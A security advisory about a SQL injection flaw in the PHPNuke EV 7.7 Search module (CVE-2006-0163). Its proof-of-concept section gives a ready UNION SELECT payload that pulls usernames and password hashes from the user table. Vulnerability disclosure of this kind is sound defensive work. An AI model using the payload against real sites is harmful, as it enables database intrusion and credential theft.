PHPNuke EV Search Module SQL Injection Vulnerability
BID:16186
Info
PHPNuke EV Search Module SQL Injection Vulnerability
| Bugtraq ID: | 16186 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-0163 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 09 2006 12:00AM |
| Updated: | Feb 14 2007 11:47PM |
| Credit: | lostmon is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHP-Nuke PHP-Nuke 7.7 Firefly Studios Stronghold 2 7.7 |
| Not Vulnerable: | |
Discussion
PHPNuke EV Search Module SQL Injection Vulnerability
PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPNuke EV version 7.7 is vulnerable; earlier versions may also be affected.
PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPNuke EV version 7.7 is vulnerable; earlier versions may also be affected.
Exploit / POC
PHPNuke EV Search Module SQL Injection Vulnerability
No exploit is required.
Example proof-of-concept code has been provided:
navigate to http://www.example.com/modules.php?name=Search and type in
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
No exploit is required.
Example proof-of-concept code has been provided:
navigate to http://www.example.com/modules.php?name=Search and type in
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
Solution / Fix
PHPNuke EV Search Module SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
PHPNuke EV Search Module SQL Injection Vulnerability
References:
References:
- PHPNuke EV 7.7 'search' module 'query' variable SQL injection (Lostmon)
- PHPNuke EV Web Site (PHPNuke EV)